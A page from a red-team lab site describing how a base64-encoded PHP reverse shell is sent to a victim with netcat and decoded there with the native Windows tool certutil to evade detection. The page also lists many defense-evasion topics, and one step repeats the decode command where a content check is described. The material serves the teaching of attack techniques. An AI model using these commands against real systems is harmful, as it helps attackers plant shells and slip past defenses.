Encode/Decode Data with Certutil - Red Teaming Experiments

Red Teaming Experiments

linkedin github @spotheplanet patreon

Search…

What is ired.team?

Pinned

Pentesting Cheatsheets

Active Directory & Kerberos Abuse

offensive security

Red Team Infrastructure

Code & Process Injection

Defense Evasion

AV Bypass with Metasploit Templates and Custom Binaries

Evading Windows Defender with 1 Byte Change

Bypassing Windows Defender: One TCP Socket Away From Meterpreter and Beacon Sessions

Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs

Windows API Hashing in Malware

Detecting Hooked Syscalls

Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs

Retrieving ntdll Syscall Stubs from Disk at Run-time

Full DLL Unhooking with C++

Enumerating RWX Protected Memory Regions for Code Injection

Disabling Windows Event Logs by Suspending EventLog Service Threads

Obfuscated Powershell Invocations

Masquerading Processes in Userland via _PEB

Commandline Obfusaction

File Smuggling with HTML and JavaScript

Alternate Data Streams

Encode/Decode Data with Certutil

Downloading Files with Certutil

Packed Binaries

Unloading Sysmon Driver

Bypassing IDS Signatures with Simple Reverse Shells

Preventing 3rd Party DLLs from Injecting into your Malware

ProcessDynamicCodePolicy: Arbitrary Code Guard (ACG)

Parent Process ID (PPID) Spoofing

Executing C# Assemblies from Jscript and wscript with DotNetToJscript

Enumeration and Discovery

Privilege Escalation

Credential Access & Dumping

Lateral Movement

reversing, forensics & misc

Dump Virtual Box Memory

AES Encryption Using Crypto++ .lib in Visual Studio C++

Reversing Password Checking Routine

Powered By GitBook

Encode/Decode Data with Certutil

Defense Evasion

In this lab I will transfer a base64 encoded php reverse shell from my attacking machine to the victim machine via netcat and decode the data on the victim system using a native windows binary certutil.
Execution
Preview of the content to be encoded on the attacking system:
Sending the above shell as a base64 encoded string to the victim system (victim is listening and waiting for the file with nc -l 4444 > enc):
[email protected]
1
base64 < shell.php.gif | nc 10.0.0.2 4444
Copied!
Once the file is received on the victim, let's check its contents:
[email protected]
1
certutil.exe -decode .\enc dec
Copied!
Let's decode the data:
[email protected]
1
certutil.exe -decode .\enc dec
Copied!
Let's have a look at the contents of the file dec which now contains the base64 decoded shell:
References
Deobfuscate/Decode Files or Information, Technique T1140 - Enterprise | MITRE ATT&CK®

Downloading Files with Certutil

Last modified 3yr ago

Copy link

Contents